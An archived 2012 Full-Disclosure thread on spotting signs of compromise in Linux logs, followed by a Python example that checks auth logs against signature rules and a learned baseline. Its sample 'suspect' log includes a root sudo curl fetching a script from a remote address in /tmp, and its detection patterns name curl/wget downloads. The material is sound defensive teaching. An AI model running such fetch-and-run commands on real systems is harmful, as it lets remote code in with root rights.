Re: [Full-disclosure] Linux - Indicators of compromise
- To: "Benji " <me@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Linux - Indicators of compromise
- From: "Ali Varshovi " <ali.varshovi@xxxxxxxxxxx>
- Date: Tue, 17 Jul 2012 00:58:16 +0000
I wasn't initially, but that's where the discussion is taking me. I was
thinking of collecting local logs from a Linux box and analyzing them to
determine whether it has been compromised or not. I understand a hybrid approach should
be taken, including pattern detection to capture known malware/backdoors and
behavioral analysis to tag any abnormal behavior.
Michael mentioned a very true and good point that theoretically the logs and
behavior of a compromised system cannot be trusted. Other folks also pointed out
that data exfiltration usually follows a compromise and can be considered a
shared pattern for the majority of attacks (I want to add command/control traffic
myself).
Friends, is that a good summary of a high level approach?
Cheers,
Ali
---------------------------------------------
Sent from my BlackBerry device
-----Original Message-----
From: Benji <me@xxxxxxxxx>
Date: Tue, 17 Jul 2012 00:31:12
To: <ali.varshovi@xxxxxxxxxxx>
Cc: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Linux - Indicators of compromise
So you're talking about making a baseline?
On Mon, Jul 16, 2012 at 7:52 PM, Ali Varshovi <ali.varshovi@xxxxxxxxxxx> wrote:
> Hello everybody and thank you for your useful comments.
>
> Now I'm thinking that we need a comparison base or normal behavior profile to
> be able to detect any deviations or abnormal/suspicious activity. While some
> known patterns of behaviors are useful to detect malware or backdoors we
> still need that normal profile to detect 0-day or APT style intrusions. Isn't
> that the same idea from early days of intrusion detection research (anomaly
> detection approach)? Or maybe I'm off track.
>
> Thoughts?
>
> ------Original Message------
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: Linux - Indicators of compromise
> Sent: Jul 14, 2012 8:46 AM
>
> Greetings FD,
>
> Does anyone have any guidelines/useful material on analyzing the logs of a Linux
> machine to detect signs of compromise? The data collection piece is not a
> challenge, as a lot of useful information can be captured using commands and
> some scripts. I'm wondering if there is any systematic approach to analyzing
> the collected logs? Most of the materials I've seen are more aligned to
> malware and rootkit detection, which is apparently not the only concern.
>
> Thanks,
>
> Ali
> ---------------------------------------------
> Sent from my BlackBerry device
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
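The hybrid approach the thread converges on (a known-pattern pass plus a
behavioral pass against a normal-activity baseline) is shown below as an added
example; it is not code from any participant in the thread. It runs over a
handful of constructed auth.log-style lines: a "baseline" window assumed to be
clean is used to learn which user/source pairs, login hours and sudo commands
are normal, and a later window is then checked against it. The two signature
indicators (root logging in over SSH with a password, and a sudo curl/wget run
out of /tmp) are assumptions chosen for the example, not an authoritative
indicator list. Per Michael's point in the thread, both windows should come
from copies of the logs shipped off the host (syslog forwarding or similar),
since the local copies on a compromised box cannot be trusted.

```python
import re
from collections import defaultdict

# Constructed sample auth.log lines for the example (syslog format; the year is
# omitted as on real systems). None of these come from a real host.
BASELINE_LOG = """\
Jul 10 09:12:01 web01 sshd[2201]: Accepted publickey for alice from 10.0.0.5 port 51022 ssh2
Jul 10 09:30:44 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get update
Jul 11 10:02:13 web01 sshd[2310]: Accepted publickey for alice from 10.0.0.5 port 51100 ssh2
Jul 11 14:15:22 web01 sshd[2377]: Accepted publickey for bob from 10.0.0.7 port 40012 ssh2
Jul 11 14:20:05 web01 sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/systemctl restart nginx
Jul 12 09:05:19 web01 sshd[2450]: Accepted publickey for alice from 10.0.0.5 port 51230 ssh2
"""

SUSPECT_LOG = """\
Jul 16 03:14:07 web01 sshd[3120]: Accepted password for root from 203.0.113.9 port 4411 ssh2
Jul 16 03:15:30 web01 sudo:    alice : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/curl -s http://203.0.113.9/x.sh
Jul 16 09:10:11 web01 sshd[3201]: Accepted publickey for alice from 10.0.0.5 port 51300 ssh2
Jul 16 09:12:40 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get update
Jul 16 23:48:55 web01 sshd[3377]: Accepted publickey for bob from 198.51.100.23 port 40999 ssh2
"""

TS = r"^(?P<month>\w{3}) +(?P<day>\d+) (?P<hour>\d\d):\d\d:\d\d \S+ "
SSH_RE = re.compile(TS + r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+) port")
# COMMAND=\S+ deliberately captures only the binary path, not its arguments.
SUDO_RE = re.compile(TS + r"sudo: +(?P<user>\S+) : .*COMMAND=(?P<cmd>\S+)")

# Known-pattern pass: assumed indicators for this example, not a vetted list.
SIGNATURES = [
    ("root-password-ssh", re.compile(r"sshd\[\d+\]: Accepted password for root from")),
    ("download-from-tmp", re.compile(r"sudo: .*PWD=/tmp .*COMMAND=\S*(curl|wget)")),
]


def parse(text):
    """Yield one record per recognised line; unrecognised lines are skipped."""
    for raw in text.splitlines():
        m = SSH_RE.match(raw)
        if m:
            yield {"type": "ssh", "hour": int(m["hour"]), "user": m["user"],
                   "src": m["src"], "method": m["method"], "raw": raw}
            continue
        m = SUDO_RE.match(raw)
        if m:
            yield {"type": "sudo", "hour": int(m["hour"]), "user": m["user"],
                   "cmd": m["cmd"], "raw": raw}


def build_baseline(text):
    """Learn the normal profile from a window assumed to be clean."""
    base = {"login_pairs": set(), "hours": defaultdict(set), "sudo_cmds": defaultdict(set)}
    for rec in parse(text):
        if rec["type"] == "ssh":
            base["login_pairs"].add((rec["user"], rec["src"]))
            base["hours"][rec["user"]].add(rec["hour"])
        else:
            base["sudo_cmds"][rec["user"]].add(rec["cmd"])
    return base


def hour_in_window(hour, seen, tolerance=2):
    """True if hour is within +/-tolerance hours (wrapping at midnight) of any baseline hour."""
    return any(min(abs(hour - h), 24 - abs(hour - h)) <= tolerance for h in seen)


def analyze(text, baseline):
    """Return (pass, name, raw_line) findings from both the signature and the anomaly pass."""
    findings = []
    for rec in parse(text):
        for name, pat in SIGNATURES:
            if pat.search(rec["raw"]):
                findings.append(("signature", name, rec["raw"]))
        if rec["type"] == "ssh":
            if rec["user"] not in baseline["hours"]:
                findings.append(("anomaly", "unknown-user", rec["raw"]))
                continue
            if (rec["user"], rec["src"]) not in baseline["login_pairs"]:
                findings.append(("anomaly", "new-login-source", rec["raw"]))
            if not hour_in_window(rec["hour"], baseline["hours"][rec["user"]]):
                findings.append(("anomaly", "off-hours-login", rec["raw"]))
        elif rec["cmd"] not in baseline["sudo_cmds"].get(rec["user"], set()):
            findings.append(("anomaly", "new-sudo-command", rec["raw"]))
    return findings


if __name__ == "__main__":
    base = build_baseline(BASELINE_LOG)
    for which, name, raw in analyze(SUSPECT_LOG, base):
        print(f"[{which}] {name}: {raw}")
```

The baseline window itself produces no findings, which is the sanity check to
run before trusting any alert: a profile that flags its own training data is
either too narrow or was not actually clean. On the suspect window the
signature pass catches the two known patterns and the anomaly pass catches a
never-seen user, a new sudo binary, and a known user arriving from a new
address at an unusual hour; the analyst still has to read the raw lines, since
the anomaly pass only says "different", not "malicious".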